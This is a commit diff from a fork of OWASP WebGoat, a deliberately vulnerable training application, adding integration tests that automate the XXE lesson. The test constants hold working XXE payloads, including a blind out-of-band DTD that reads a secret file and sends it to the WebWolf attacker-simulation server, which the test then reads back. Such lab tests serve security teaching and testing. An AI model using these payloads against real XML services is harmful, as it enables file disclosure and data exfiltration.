dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

completed test

Browse Source
This commit is contained in:
Rene Zubcevic 2019-09-18 16:10:52 +02:00
parent ec236a4ff5
commit 30d38f9b56
3 changed files with 60 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
View File

@ -3,6 +3,7 @@ package org.owasp.webgoat;
import io.restassured.RestAssured; import io.restassured.RestAssured;
import io.restassured.config.RestAssuredConfig; import io.restassured.config.RestAssuredConfig;
import io.restassured.config.SSLConfig; import io.restassured.config.SSLConfig;
import io.restassured.http.ContentType;
import lombok.Getter; import lombok.Getter;
import org.hamcrest.CoreMatchers; import org.hamcrest.CoreMatchers;
import org.junit.After; import org.junit.After;
@ -211,6 +212,7 @@ public abstract class IntegrationTest {
.cookie("JSESSIONID", getWebGoatCookie()) .cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc")) .get(url("service/lessonoverview.mvc"))
.then() .then()
.log().all()
.statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true))); .statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));
Assert.assertThat(RestAssured.given() Assert.assertThat(RestAssured.given()
@ -222,4 +224,20 @@ public abstract class IntegrationTest {
.statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix))); .statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix)));
} }
public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.contentType(contentType)
.cookie("JSESSIONID", getWebGoatCookie())
.body(body)
.post(url)
.then()
.statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
}
} }

62
webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
View File

@ -5,8 +5,6 @@ import java.nio.file.Files;
import java.nio.file.Path; import java.nio.file.Path;
import java.nio.file.Paths; import java.nio.file.Paths;
import org.hamcrest.CoreMatchers;
import org.junit.Assert;
import org.junit.Test; import org.junit.Test;
import io.restassured.RestAssured; import io.restassured.RestAssured;
@ -16,7 +14,7 @@ public class XXETest extends IntegrationTest {
private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>"; private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>"; private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file://SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURLlanding?text=%file;'>\">%all;"; private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;";
private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>"; private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat"); private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
@ -28,15 +26,33 @@ public class XXETest extends IntegrationTest {
startLesson("XXE"); startLesson("XXE");
checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true); checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true); checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
Path webWolfFilePath = Paths.get(webwolfFileDir);
checkAssignment(url("/WebGoat/xxe/blind"),ContentType.XML,"<comment><text>"+getSecret()+"</text></comment>",true );
checkResults("xxe/");
}
/**
* This performs the steps of the exercise before the secret can be committed in the final step.
* @return
* @throws IOException
*/
private String getSecret() throws IOException {
//remove any left over DTD
Path webWolfFilePath = Paths.get(webwolfFileDir);
if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) { if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
System.out.println("delete file");
Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd"))); Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
} }
String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt"); String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile); String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
System.out.println(dtd7String);
//upload DTD
RestAssured.given() RestAssured.given()
.when() .when()
.config(restConfig) .config(restConfig)
@ -46,28 +62,20 @@ public class XXETest extends IntegrationTest {
.then() .then()
.extract().response().getBody().asString(); .extract().response().getBody().asString();
//upload attack
String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser()); String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser());
System.out.println(xxe7String);
checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false ); checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false );
//checkResults("/XXE/"); //read results from WebWolf
String result = RestAssured.given()
} .when()
.config(restConfig)
public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) { .cookie("WEBWOLFSESSION", getWebWolfCookie())
Assert.assertThat( .get(webWolfUrl("/WebWolf/requests"))
RestAssured.given() .then()
.when() .extract().response().getBody().asString();
.config(restConfig) result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33);
.contentType(contentType) return result;
.cookie("JSESSIONID", getWebGoatCookie())
.body(body)
.post(url)
.then()
.log().all()
.statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
} }
} }

8
webgoat-integration-tests/src/test/resources/application-inttest.properties
View File

@ -1,6 +1,10 @@
#In order to run tests a known temp directory is preferred
#that is why these values are used
webgoat.user.directory=${user.dir}/target/.webgoat webgoat.user.directory=${user.dir}/target/.webgoat
webgoat.server.directory=${user.dir}/target/.webgoat webgoat.server.directory=${user.dir}/target/.webgoat
webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
spring.jpa.hibernate.ddl-auto=create-drop #database will get deleted for every mvn clean install
#as these extra properties are read by WebGoat and WebWolf the drop of the tables
#was not helpful.